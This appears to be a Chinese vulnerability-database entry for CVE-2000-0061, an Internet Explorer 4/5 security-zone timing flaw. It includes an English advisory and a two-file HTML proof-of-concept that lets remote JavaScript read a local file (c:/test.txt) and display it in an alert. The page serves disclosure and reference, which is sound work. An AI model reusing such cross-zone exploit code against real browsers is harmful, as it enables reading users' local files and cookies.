Microsoft Internet Explorer安全区标签设置漏洞

Microsoft Internet Explorer安全区标签设置漏洞

漏洞ID 1105682 漏洞类型 竞争条件
发布时间 2000-01-07 更新时间 2005-10-20
图片[1]-Microsoft Internet Explorer安全区标签设置漏洞-安全小百科CVE编号 CVE-2000-0061
图片[2]-Microsoft Internet Explorer安全区标签设置漏洞-安全小百科CNNVD-ID CNNVD-200001-024
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/19719
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-024
|漏洞详情
InternetExplorer5无法修改正在加载到一个窗口的安全区,直到加载完成。当文件正在加载时,远程攻击者利用此漏洞可以在不同的安全环境中执行Javascript。
|漏洞EXP
Microsoft Internet Explorer 4.0 for Windows 3.1/Windows 95,Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.5 preview,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Internet Explorer 5.0.1 Security Zone Settings Lag Vulnerability

source: http://www.securityfocus.com/bid/923/info

When a new document is loaded into an IE window, IE will not update the Security Zone settings for that window until the new document is completely loaded. This means that if a local document is loaded, and then a large remote document is loaded that has JavaScript at the very beginning, the JavaScript may load and execute before the Security Zone settings are updated. This could lead to remote and untrusted JavaScript running as local trusted code, with full access to local files, cookies, etc.


-----------------img2main.html---------------------------------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\test.txt and it will be read and shown in a message box");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links[0].click()",2000);
</SCRIPT>
---------------------------------------------------------------------

----------------img2.html--------------------------------------------
<HTML>
<IMG SRC="javascript:a=window.open('javascript:alert('Here is your file: '+opener.document.body.innerText)');alert('Just an alert, but is necessary. Wait a little.')">
</HTML>
---------------------------------------------------------------------
|参考资料

来源:BID
名称:923
链接:http://www.securityfocus.com/bid/923

相关推荐: Meteor FTP Server USER Memory Corruption Vulnerability

Meteor FTP Server USER Memory Corruption Vulnerability 漏洞ID 1099791 漏洞类型 Boundary Condition Error 发布时间 2003-08-08 更新时间 2003-08-08 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享